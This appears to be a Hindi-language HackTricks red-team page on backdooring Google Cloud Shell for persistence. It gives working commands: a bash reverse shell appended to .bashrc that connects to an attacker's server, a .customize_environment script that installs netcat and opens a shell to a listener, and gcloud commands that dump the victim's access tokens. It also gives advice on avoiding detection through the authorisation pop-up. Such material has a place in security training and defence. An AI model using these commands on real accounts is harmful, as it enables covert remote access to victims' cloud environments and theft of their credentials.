GCP - Cloud Shell Persistence

Reading time: 5 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Cloud Shell

अधिक जानकारी के लिए देखें:

GCP - Cloud Shell Enum

Persistent Backdoor

Google Cloud Shell आपको आपके क्लाउड संसाधनों तक सीधे आपके ब्राउज़र से कमांड-लाइन पहुंच प्रदान करता है, बिना किसी संबंधित लागत के।

आप वेब कंसोल से या gcloud cloud-shell ssh चलाकर Google का Cloud Shell एक्सेस कर सकते हैं।

इस कंसोल में हमलावरों के लिए कुछ दिलचस्प क्षमताएँ हैं:

  1. कोई भी Google उपयोगकर्ता जिसे Google Cloud तक पहुंच है एक पूरी तरह से प्रमाणित Cloud Shell उदाहरण तक पहुंच रखता है (सेवा खाते, यहां तक कि संगठन के मालिक होने पर भी)।
  2. कहा गया उदाहरण कम से कम 120 दिनों तक अपने होम डायरेक्टरी को बनाए रखेगा यदि कोई गतिविधि नहीं होती है।
  3. उस उदाहरण की गतिविधि की निगरानी के लिए किसी संगठन के लिए कोई क्षमताएँ नहीं हैं

इसका मतलब यह है कि एक हमलावर उपयोगकर्ता के होम डायरेक्टरी में एक बैकडोर रख सकता है और जब तक उपयोगकर्ता हर 120 दिनों में GC Shell से कनेक्ट करता है, बैकडोर जीवित रहेगा और हमलावर हर बार इसे चलाने पर एक शेल प्राप्त करेगा बस ऐसा करके:

bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

एक और फ़ाइल है जो होम फ़ोल्डर में .customize_environment कहलाती है, जो यदि मौजूद है, तो हर बार उपयोगकर्ता द्वारा cloud shell का उपयोग करने पर चलायी जाएगी (जैसे पिछले तकनीक में)। बस पिछले बैकडोर या निम्नलिखित में से एक को डालें ताकि उपयोगकर्ता "नियमित रूप से" cloud shell का उपयोग करते समय स्थिरता बनी रहे:

bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

warning

यह ध्यान रखना महत्वपूर्ण है कि पहली बार जब कोई क्रिया जो प्रमाणीकरण की आवश्यकता होती है, की जाती है, तो उपयोगकर्ता के ब्राउज़र में एक पॉप-अप प्राधिकरण विंडो प्रकट होती है। इस विंडो को स्वीकार करना आवश्यक है इससे पहले कि कमांड चल सके। यदि कोई अप्रत्याशित पॉप-अप प्रकट होता है, तो यह संदेह पैदा कर सकता है और संभावित रूप से उपयोग की जा रही स्थिरता विधि को खतरे में डाल सकता है।

यह पॉप-अप है जो gcloud projects list को क्लाउड शेल (हमलावर के रूप में) से निष्पादित करने पर उपयोगकर्ता सत्र में ब्राउज़र में देखा जाता है:

हालांकि, यदि उपयोगकर्ता ने सक्रिय रूप से क्लाउडशेल का उपयोग किया है, तो पॉप-अप नहीं दिखाई देगा और आप उपयोगकर्ता के टोकन एकत्र कर सकते हैं:

bash
gcloud auth print-access-token
gcloud auth application-default print-access-token

SSH कनेक्शन कैसे स्थापित किया जाता है

बुनियादी रूप से, इन 3 API कॉल का उपयोग किया जाता है:

लेकिन आप https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key में और जानकारी प्राप्त कर सकते हैं

संदर्भ

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें